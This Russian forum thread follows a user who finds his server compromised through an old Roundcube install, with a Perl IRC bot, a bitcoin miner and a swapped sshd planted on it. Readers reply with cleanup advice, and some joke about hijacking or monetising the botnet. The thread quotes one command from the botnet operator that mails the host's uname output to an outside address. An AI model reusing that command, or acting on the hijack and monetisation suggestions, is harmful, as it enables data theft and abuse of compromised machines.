LINUX.ORG.RU

Обнаружил ботнет

 ,


1

8

Взломали мой сервак, кинули перловый скрипт. Скрипт является ботом, управляется по IRC. Зашел на IRC сервер в канал, а там их 1000шт. Что делать?



Последнее исправление: cetjs2 (всего исправлений: 3)

а там их 1000шт. Что делать?

Перехватывать управление, что ж ещё :)

Umberto ★☆
()

Попробуй изучить протокол работы. Можно как перехватить управление, так и разослать всем хозяевам этих серверов сообщения о том что их взломали.

rezedent12 ☆☆☆
()

Поднимай службы сервака с чистого листа, исключая возможность закидывания бота из бэкапа.

Если ковбой - можешь попытаться выяснить, как работает бот и придушить гадину прицельно, не снося систему.

В любом случае ещё нужно определить путь проникновения заразы и закрыть брешь.

Krieger_Od ★★
()
Ответ на: комментарий от zmitrok62

Есть скрипт с исходником же =) Но владеть, а тем более пользовать не хочу.

Тогда попробуй послать команду самоуничтожения, что бы скрипт удалил себя и завершился. Представляю как припечёт автору ботнета. Скрипт всё же сохрани, а лучше выложи на LOR для препарирования.

rezedent12 ☆☆☆
()

Бочку. Пости скрипт суда и адрес ирц.

anonymous
()
Ответ на: комментарий от rikardoac

Похоже он выполнил операцию уничтожения мозга ТСа :)

anonymous
()
Ответ на: комментарий от ritsufag

Уязвимость была в древнем Roundcube. Чувак писал файлы от www-data в /tmp. Умудрился даже скомпилить два сишника. Один из них умел выполнять bash команды с удаленного хоста. Второй майнил биткоины. Скрипт пока не выложу, изучаю...

zmitrok62
() автор топика
Ответ на: комментарий от KendovNorok

Как разберусь, что надо сказать ботам в чате, есть идея задосить сам IRC сервак XD

zmitrok62
() автор топика

Перехвати управление, зарабатывай деньги ботнетом.

Хотя 1000 шт мелковато.

Legioner ★★★★★
()
Ответ на: комментарий от afanasiy

Спасибо! Сейчас смотрю в окно чата, зашел админ. Пишет:

cd /tmp
.say echo a > a.txt;cat a.txt | mail -s "`uname -ns`" blabla@hotmail.com

И в моей /tmp создается этот файл.... Ушел искать.

zmitrok62
() автор топика
Ответ на: комментарий от anonymous

Бот позволяет выполнять команду на зараженной машине. Значит надо выполнить правильную команду чтобы грохнуть на всех машинах его.

zmitrok62
() автор топика
Ответ на: комментарий от madcore

А можно подробнее про механизмы взлома и работы скрипта ?

телепатирую (~98%) - подбор пароля пользователя. Потому как, если бы серьёзнее что, не нашёл бы. А если нашёл бы, не нуждался бы в ответах на такие вопросы. ;-)

AS ★★★★★
()

Скрипт является ботом, управляется по IRC.

То есть должно быть еще что-то на хосте для коннекта к IRC, при чем, я так понимаю, что-то особое?

alozovskoy ★★★★★
()

Запусти однострочник.

vurdalak ★★★★★
()
Ответ на: комментарий от zmitrok62

Я про внутренность спрашивал. Если у меня нет ничего, чем коннектиться к IRC, у меня же эта шняга не взлетит? Я вот о чем.

alozovskoy ★★★★★
()
Ответ на: комментарий от zmitrok62

Читай, все описано как ломали. По ссылке тоже самое.

Всё равно не особенно серьёзное. :-)
Хотя, кто знает... Если какие-то локальные уязвимости эксплуатируются, возможно, при их наличии, умеет и хорошо ховаться.

AS ★★★★★
()

Уязвимость была в древнем Roundcube
Что делать?

Осилить SELinux на дефолтовых политиках.

shahid ★★★★★
()
Ответ на: комментарий от rezedent12

Попробуй изучить протокол работы. Можно как перехватить управление, так и разослать всем хозяевам этих серверов сообщения о том что их взломали.

Даааа :) Сообщение о том, что взломали :))

ktulhu666 ☆☆☆
()
Ответ на: комментарий от zmitrok62

# Dont change nothing if u dont know what u do! #

Так умиляет эта строчка.

sT331h0rs3 ★★★★★
()
Ответ на: комментарий от zmitrok62

надо быть юзером с никнеймом bong

По ходу хозяин ботнета в теме =)

_____________________$______________________
____________________$$$_____________________
____________________$$$_____________________
__$________________$$$$$_______________$____
___$$______________$$$$$_____________$$_____
____$$$____________$$$$$___________$$$______
_____$$$$$_________$$$$$________$$$$$_______
______$$$$$$$______$$$$$_____$$$$$$$________
________$$$$$$$____$$$$$___$$$$$$$__________
___________$$$$$____$$$___$$$$$_____________
__$$$$$$$______$$$__$$$__$$$______$$$$$$$___
______$$$$$$$$____$$_$_$$____$$$$$$$$_______
__________$$$$$$$$$_$$$_$$$$$$$$$___________
_________________$$$_$_$$$__________________
_____________$$$$$___$___$$$$$______________
_____________________$______________________
FreeBSD ★★★
()

> Зашел на IRC сервер в канал, а там их 1000шт.

> ...

> Второй майнил биткоины.

Опа. С тыщи компов можно миллионы рублей в месяц получать.

ZenitharChampion ★★★★★
()
Ответ на: комментарий от router

Ага, сразу в ФБР и NW3C:

The IC3 accepts online Internet crime complaints from either the actual victim or from a third party to the complainant.

Sense
()

А всё СТИМ виноват

Не лез бы куда не надо ничего этого не было бы :(

anonymous
()
Ответ на: комментарий от zmitrok62

Восстанавливать из бекапа, сделанного до даты взлома. Ну и сразу после этого кубик снести и делать харденинг.

eabi
()
Ответ на: комментарий от eabi

Поменял sshd на родной. Что примечательно, у родного и подмененного, размер файла байт в байт. Но MD5 не сходятся. А кубик я сразу уже подключил.

zmitrok62
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.